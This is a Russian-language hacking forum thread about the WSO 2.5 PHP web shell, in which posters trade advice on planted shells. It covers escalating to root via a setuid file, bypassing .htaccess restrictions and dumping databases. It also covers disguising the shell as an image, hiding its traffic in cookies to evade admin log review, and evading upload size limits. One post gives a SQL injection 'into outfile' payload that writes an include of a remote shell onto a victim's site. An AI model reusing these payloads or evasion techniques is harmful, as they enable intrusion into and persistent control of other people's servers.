WSO 2.5 Modified

Discussion in 'Избранное' started by randman, 6 Aug 2011.

  1. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    попугай, я хочу рута получить имея права обычного пользователя или ноубоди, конечно же =)
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Тебе тогда в другую тему для начала - http://forum.antichat.ru/thread296327.html

    Суидник нужен, если у тебя уже есть рут-доступ.
     
    1 person likes this.
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Залей в tmp, может тебе так больше понравиться :)
    Главное ещё, чтобы файл рутом был создан.... +s права всмысле..
     
    #63 Osstudio, 30 Dec 2011
    Last edited: 31 Dec 2011
  4. Jopashnik

    Jopashnik New Member

    Joined:
    27 Oct 2010
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    скажите вопрос такой, залить шелл залил, пытаюсь править файл .htaccess не дает, пишет правка запрещена, пытался поправить конфиг или изменить права доступа тоже не дает, что можно еще попробовать? шеллом как то поменять файл .htaccess кроме простого способа есть шанс??? или может как то изменить права на конфиг?
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Почему дамп БД не пашет? или только у меня так?
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Только у тебя.
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    после редактирования файлов выдает
    Code:
    Query did not return anything
    из-за чего это?
    и да, изменения не сохраняются.
     
    _________________________
    #67 yarbabin, 13 Feb 2012
    Last edited: 13 Feb 2012
  8. Vladislav88

    Vladislav88 New Member

    Joined:
    5 Dec 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Зарегил домен hut4.ru на сайте holm.ru , залил к себе на сайт wso , и теперь я могу видеть абсолютно все сайты зарегистрированые на hut4.ru + login (вроде больше ничего не могу делать). Это недоработки сервера или это нормально? Я новичок и не знаю , просто интересно что это значит? Заранее спасибо за ответ.
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ну просмотр файлов, я думаю, тебе недоступен :)
    это нормально
     
    _________________________
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    А ты при дампе укажи в названии файла диру куда надо дамп положить, например

    /tmp/wso-22323.zip

    Абсолютно нормальная ситуация, не нормально, если при этом ядро старое и дырявое)
     
    _________________________
  11. n4yk

    n4yk New Member

    Joined:
    15 Sep 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Тыц

    Было бы неплохо доработать шелл, или выпустить альтернативную версию чтобы параметры передавались не постом а через СOOKIE, думаю на JavaScript пару минут скриптик написать чтобы при клике вызывалась функция с параметрами, которая установит новое значение куки и обновит страницу чтобы они передались.
    P.S. плюсов от этого будет много) к примеру шелл замаскирован под картинку, и в логах админ в 2 счета поймет что Запись вида "POST /images/lalala.jpg" выглядит подозрительной))
    можно даже обратно передавать данные через Set-Cookie:,
    и тогда не будет меняться размер файла при выдаче, т.к. если подряд идет обращение к одной картинке, у которой в логах каждый раз новый размер тоже вызывает подозрения)) думаю лучше всего если выпустить просто альтернативную версию аля "Cookie Edition", в которой будут только основные функции, которые можно реализовать через куки (само собой файлы заливать через куки не катит)))

    P.S. Надеюсь меня услышат, спасибо)
     
  12. comcord

    comcord New Member

    Joined:
    2 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Бредовый метод. Мне кажется что в r57 лучше поправить функцию ex (добавить ./suid) и юзать на здоровье. Потому как там список файлов через ls -lua выводится.
     
  13. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    При работе через suid-файл есть проблемы с редактированием файлов, размер которых > ~5 Кб. Выводится чистая страница с "Query did not return anything". Это как-нибудь фиксится?
     
  14. mrfreeze

    mrfreeze New Member

    Joined:
    4 Apr 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь залить через скул, вбиваю запрос
    Code:
    union select '<? @include("http://mysite/shell.php"); ?>' into outfile '/var/www/htdocs/404.php'
    Захожу на http://www.victim.com/404.php, мне вылезает 404. Куда он девается?
     
    #74 mrfreeze, 22 Jul 2012
    Last edited: 22 Jul 2012
  15. roflzi

    roflzi New Member

    Joined:
    16 Apr 2010
    Messages:
    42
    Likes Received:
    0
    Reputations:
    0
    Господ ТС, интересует следующий вопрос:

    был ли исправлен баг при базе данных с таблицами, содержащими пробелы в имени?
    В оригинальном ВСО sql браузер просто фейлит конкретно, если такие таблицы присутствуют...

    Проблема в передачe count(*), нужно брать имена таблиц в кавычки при обращении select .. from 'table name'...
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Попробуй PAS как альтернативу... В WSO не сталкмвался с таким багом...
     
    _________________________
  17. roflzi

    roflzi New Member

    Joined:
    16 Apr 2010
    Messages:
    42
    Likes Received:
    0
    Reputations:
    0
    Дорогой элито-бир, величайший автор рдп брут PRIV8 (здравствуй, давно не виделись)

    1) В данном топике я хотел бы обсудить конкретно WSO, а не нечто другое (PAS в данный момент меня не интересует, я знаю что это).
    2) Меня не особо интересует что ты не встречался с данным вопросом, т.к. просто руки не доходили или ещё почему либо, в то время как баг присутствует и я предлагаю его фикс.

    По-этому прошу не офтопить, хотя бы потому, что мой конкретный вопрос был адресован к ТС.
    Спасибо
     
  18. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    Можно инструкцию по поводу "Suid" в WSO?
     
  19. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    зачем нужен wso2_pack.php в архиве?
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Он более мелкого размера.

    Это на случай обхода ограничения на объём загружаемого файла. - Можно закосить под "картинку" ну или ещё что-то что требуется...
     
    _________________________